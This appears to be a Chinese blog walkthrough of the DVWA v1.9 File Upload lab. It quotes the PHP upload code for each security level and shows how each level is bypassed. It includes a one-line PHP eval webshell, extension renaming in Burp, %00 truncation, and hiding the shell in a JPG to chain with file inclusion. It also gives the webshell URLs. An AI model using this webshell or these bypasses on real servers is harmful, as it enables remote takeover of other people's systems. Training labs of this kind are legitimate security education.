欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

DVWA V1.9:File Upload(文件上传)

程序员文章站 2022-07-16 15:40:24
...

File Inclusion 介绍

上传的文件是Web应用程序的一大风险。
许多攻击的第一步是让一些代码攻击系统,然后攻击者只需要找到一种方法来执行代码。
使用文件上传有助于攻击者完成第一步。

不受限制的文件上传的后果会有所不同,包括完整的系统接管、过载的文件系统、向后端系统转发攻击和简单的破坏。
这取决于应用程序对上传文件所做的操作,包括存储的位置。
DVWA V1.9:File Upload(文件上传)

Low 级别

核心代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

basename(path,suffix)
函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。

可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

官方提示

低级别将不检查文件以任何方式上载的内容。它只依赖于信任。

Spoiler: Upload any valid PHP file with command in it.

漏洞利用

文件上传漏洞的利用是有限制条件的,
首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。
不幸的是,这里三个条件全都满足。

编写php一句话木马文件。

<?php eval($_POST[wanku]);?> 

DVWA V1.9:File Upload(文件上传)
上传木马文件。
DVWA V1.9:File Upload(文件上传)
路径也给出来了,使用菜刀去连接,成功。

http://43.247.91.228:81/hackable/uploads/shell.php

DVWA V1.9:File Upload(文件上传)

Medium 级别

核心代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

可以看到,Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。

官方提示

当使用媒体级别时,它将在上传时检查客户端的报告文件类型。

Spoiler: Worth looking for any restrictions within any "hidden" form fields.

漏洞利用

因为采用的是一句话木马,所以文件大小不会有问题,至于文件类型的检查,尝试修改文件名为hack.png,上传是OK的。
DVWA V1.9:File Upload(文件上传)
DVWA V1.9:File Upload(文件上传)
但是我们使用菜刀去连接时,因为木马不是php文件,并不以php格式执行,所以编译不了。
DVWA V1.9:File Upload(文件上传)
方法一:抓包改名
这时候我们就需要使用burp进行抓包,把png后缀改成php,以便执行php一句话。
DVWA V1.9:File Upload(文件上传)
发送到Repeater模块修改后缀,上传成功。
DVWA V1.9:File Upload(文件上传)
再使用菜刀去连接shell2.php文件,成功拿到shell。
DVWA V1.9:File Upload(文件上传)
方法二:截断绕过
在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为hack.php%00.png。

上传成功。
DVWA V1.9:File Upload(文件上传)
而服务器会认为其文件名为hack.php,顺势解析为php文件。
遗憾的是,由于本次实验环境的php版本为5.5.9,所以无法进行验证。
DVWA V1.9:File Upload(文件上传)

High 级别

核心代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

strrpos(string,find,start)
函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

getimagesize(string filename)
函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。

可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpg”、”.jpeg” 、”*.png”之一。
同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。

官方提示

一旦从客户端接收到该文件,服务器将尝试调整请求中包含的任何图像的大小。

Spoiler: need to link in another vulnerability, such as file includion.

漏洞利用

copy参考链接中的利用方法

首先利用copy将一句话木马文件php.php与图片文件1.jpg合并
DVWA V1.9:File Upload(文件上传)
DVWA V1.9:File Upload(文件上传)
DVWA V1.9:File Upload(文件上传)
打开可以看到,一句话木马藏到了最后。
DVWA V1.9:File Upload(文件上传)
顺利通过文件头检查,可以成功上传。
DVWA V1.9:File Upload(文件上传)
上菜刀,右键添加shell,地址栏填入

http://192.168.153.130/dvwa/vulnerabilities/fi/?page=file:///C:/xampp/htdocs/dvwa/hackable/uploads/hack.jpg

参数名填apple,
脚本语言选择php。
DVWA V1.9:File Upload(文件上传)
成功拿到webshell。
DVWA V1.9:File Upload(文件上传)

Impossible 级别

核心代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

in_get(varname)
函数返回相应选项的值

imagecreatefromjpeg ( filename )
函数返回图片文件的图像标识,失败返回false

imagejpeg ( image , filename , quality)
从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从0(最差质量,文件更小)到100(最佳质量,文件最大)。

imagedestroy( img )
函数销毁图像资源

可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。

官方提示

这将检查从所有级别到目前为止的一切,然后重新编码图像。这将产生一个新的图像,从而剥离任何“非图像”代码(包括元数据)。

参考链接:
新手指南:DVWA-1.9全级别教程之File Upload